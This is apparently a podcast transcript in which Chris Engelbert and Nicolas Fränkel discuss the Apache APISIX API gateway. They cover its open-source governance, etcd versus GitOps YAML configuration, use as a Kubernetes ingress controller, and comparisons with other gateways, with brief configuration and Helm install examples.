Chris Engelbert: Yeah, I agree. And I mean, we know each other for a long time. You know that I’m a big fan of open source for exactly all those reasons. Also from a company perspective, like a backing company, like in this case, API7, I think it makes a lot of sense. Because you get– I don’t want to say free help, but you get people that love your project, your product, and that are willing and happy to contribute as well.

Nicolas Fränkel: Exactly. I mean, we both worked for Hazelcast, although at different periods. And that was open source. But for me, this is the next step. The product is not only open source, and open source is at a very interesting moment right now, because some companies are afraid that their product will be shrink-wrapped by a cloud provider, and they switch to an "open" license, which is not truly open source according to the definition. But the Apache Foundation is fully open source. So even if, for whatever reason, API7 decides not to work on the project anymore, the project is still there. And if you find a couple of maintainers, it means it's still maintained.

Chris Engelbert: So from a deployment perspective, I guess I deploy that into Kubernetes, or?

Nicolas Fränkel: That's the thing. It's not focused on Kubernetes. So you can deploy it on any cloud provider, or even directly on a machine of your choice. You have basically two modes. The first mode is the one that you would probably play with at first. You deploy your nodes, and then you deploy etcd, the same distributed key-value store used by Kubernetes to hold its configuration. Then you can change the configuration of APISIX through an API call, and it will store that configuration in etcd. It's very dynamic. If you have more maturity in GitOps, or in DevOps in general, perhaps you will notice: oh, now where is my configuration? Well, in etcd. But now I need to back it up. How do I migrate? I need to move the data from etcd to another cluster. So it's perhaps not the best production-grade way. Another way is to have everything static in YAML files. I hate YAML.

But at the moment everybody is using YAML, and that's the configuration. At least Ops understands how to operate that. So every node has its own set of YAML files, and those YAML files are synchronized, GitOps-style, with a GitHub repository. The GitHub repository is then the source of truth, and it can be read, it can be audited, it can be whatever. Whereas if you store everything in etcd, it still works the same way, but it's opaque. You don't know what happens, right?
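
For the static variant, the idea is roughly the following: APISIX runs in standalone mode and reads its routes from a YAML file that lives in Git instead of etcd. The file below is a minimal sketch; enabling standalone mode and the exact file location depend on your deployment, so treat the details as assumptions to verify against the docs.

```yaml
# apisix.yaml: declarative, Git-tracked configuration (standalone mode, no etcd).
# The trailing "#END" marker tells APISIX the file was written out completely.
routes:
  - uri: /orders/*
    upstream:
      type: roundrobin
      nodes:
        "orders-svc:8080": 1
#END
```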

Chris Engelbert: I mean, the last thing you said with the GitHub repository being basically infrastructure as code, source of truth, that would probably then play into something like ArgoCD to deploy the updated version.

Nicolas Fränkel: Right, that makes sense. We don't enforce any particular product. We just provide a way to statically configure Apache APISIX, and then you use whatever product you want. We are not partisan; we just allow you to do it.

Chris Engelbert: So from your own feeling, what do you think is the most common use case for API gateways? Is it, as you said, rate limiting? I can see that as a very common thing, not only for companies like X or Twitter or whatever you want to call them these days, but also GitHub. I think every meaningful API has some kind of rate limit. But I could also see DDoS protection, although I think people would probably use Cloudflare or one of these providers for that. What do you think is the biggest typical use case?

Nicolas Fränkel: If you are using APIs, you probably need something more than just a traditional reverse proxy. If you are using a reverse proxy, you are happy with it, and you didn't hit any of its limits, just keep using your reverse proxy. But as I mentioned, once you start to dip your feet into the API world, you will notice where the reverse proxy's features end. It has some of the features that you want, but perhaps not the ease or the flexibility of configuration that you want. Say you want to treat different clients in different ways. That's probably the time when you need to think: okay, I need to think about migrating to an API gateway.

But contexts are so different that it's very hard to provide a simple solution that caters to everybody's needs. You could have a reverse proxy at the entrance of your whole information system, and at the second level you would have the API gateway. Or you could have an API gateway for each, I don't know, domain of your organization, because your organization has different teams for every domain. And though it would be possible to have one gateway that is managed by different teams, it makes a lot of sense to have each team managing their own configuration on their own component. It's like with microservices: everybody manages their own stuff, and you are sure that nobody steps on each other's feet. But again, it depends a lot on the size, on how well you're organized, on the maturity, on many different things. There are probably as many architectures as there are organizations.

Chris Engelbert: Just quickly, hinting back at Kubernetes, and I may be wrong here: if I use APISIX, I do not need any other ingress system, because APISIX can be the ingress provider for Kubernetes, right?

Nicolas Fränkel: So getting back to Kubernetes, yes, we have an ingress controller. And we have a Helm chart. You can install APISIX inside your Kubernetes cluster, and it will serve as an ingress controller. So you will have the ingress controller itself, and it will configure Apache APISIX according to your manifests.
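
A minimal sketch of that setup with Helm (the chart location and value names are assumptions based on the public chart; verify against the chart's README):

```bash
helm repo add apisix https://charts.apiseven.com
helm repo update

# Install APISIX together with its ingress controller into its own namespace.
helm install apisix apisix/apisix \
  --namespace apisix --create-namespace \
  --set ingress-controller.enabled=true
```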

Chris Engelbert: All right, cool. So just looking at the time. Yeah, 20 minutes is not a lot. So when I want to use APISIX, should I call you guys at API7? Or should I go with the Apache project? Or should I do something else?

Nicolas Fränkel: It depends. I would always encourage people, if you are a tech person, to just take the project, use the Docker container, for example, play with it, check if it's exactly what you need, and try to understand the limits and the benefits in your own organization. Then if you've got questions, we've got a Slack I can send you the link to, and you can start to ask questions like, "Why, in this case, when I tried to do that, does it work like this when I wanted it to do that?" Then, when you think that Apache APISIX is the right solution, check if the open source version is enough. I believe if you are running a company, you will need to have some kind of support at some point. Up until that point, of course, just use the open source version and be happy with it. If you want to use it in a production-grade environment with support, with guarantees, and so on, of course, please call us. It also pays my salary, so that's great. You're welcome to play with the open source version and check if it suits your requirements.

Chris Engelbert: Before we come to the last question, which is something I always have to ask people, maybe a quick comparison to other products. There are a lot of API gateways, at least in air quotes on the market. Why is APISIX special?

Nicolas Fränkel: First, every cloud provider comes with its own API gateway. My feeling is that all of them are much better integrated but much more limited in features. Again, if it suits you, then use them. That's fine. If you find yourself needing workarounds at some point, then perhaps it's time to move away from them. As for comparisons, the only really in-depth comparison I've done so far is with the Spring Cloud Gateway. I have written a blog post, but in short, if you are a developer team using Spring, knowing Spring, then use the Spring Cloud Gateway. It will be fine. If you want an Ops team to operate it, then it probably won't be that great. At the basic level you can do a lot with YAML, but then you find yourself needing to write Java code. Ops people, I'm sorry, but they are not experts in writing Java code. You don't want to have a compile phase.

Anyway, as I mentioned before, if you are a team that manages your own domain, you have only developers or DevOps people, you are familiar with Java, you are expert in Spring, and you only want to manage your own stuff, then perhaps it could be a very good gateway for your needs. Otherwise, I'm not sure it's a great idea. Regarding the others, I honestly have no clue what the pros and cons are compared to Apache APISIX, but I know that Apache APISIX is the only truly open source project among them, the only one managed by the Apache Foundation. If you care about open source, not because you love open source so much, but because you care about the future of the project and its long-term maintainability, then that's our main benefit. I won't talk about performance or whatever, because, again, I didn't do any benchmarks myself, and every benchmark provided by any vendor can probably be discarded out of the box, because you should do your own benchmark in your own infrastructure.

Chris Engelbert: Yeah. I couldn't have said that any better. It's something that I keep telling people when they ask. Whatever company you work for, there are always people asking for benchmarks, and it's always: don't believe benchmarks. Even if a vendor is really honest and tries to do meaningful benchmarks, it's always an artificial dataset or whatever. Run your own benchmarks, do it with your own datasets and operational behavior, and figure it out yourself. We can help you, but you just shouldn't take a vendor's benchmarks at face value.

Nicolas Fränkel: Right. Exactly.

Chris Engelbert: Alright. Ok. So we’re coming to the end of our episode. And something that I always ask everybody is if there’s one thing that you think people should take away from our conversation today, what would that be?

Nicolas Fränkel: I think the most important thing is that regardless of the project or the tool that you choose, that you choose it for the right reasons. As I mentioned, if you’re using a cloud provider and if it suits your needs, then use it. If it doesn’t suit your needs, if it’s too limited, then don’t hesitate to move away. The good thing with the cloud is that you’re not stuck, right? And if you want a product that is focused on open source, and if you are in the open source space, I think Apache APISIX is a very good solution. And yeah, that’s it. Always make choices that fit your needs. And it’s good that you don’t have just one choice, right? You have a couple of them.

Chris Engelbert: That’s really well said. All right, so thank you very much, Nicolas, for being on the show. It was great having you.

Nicolas Fränkel: Thank you.

The post Improve Security with API Gateways, Nicolas Fränkel appeared first on simplyblock.
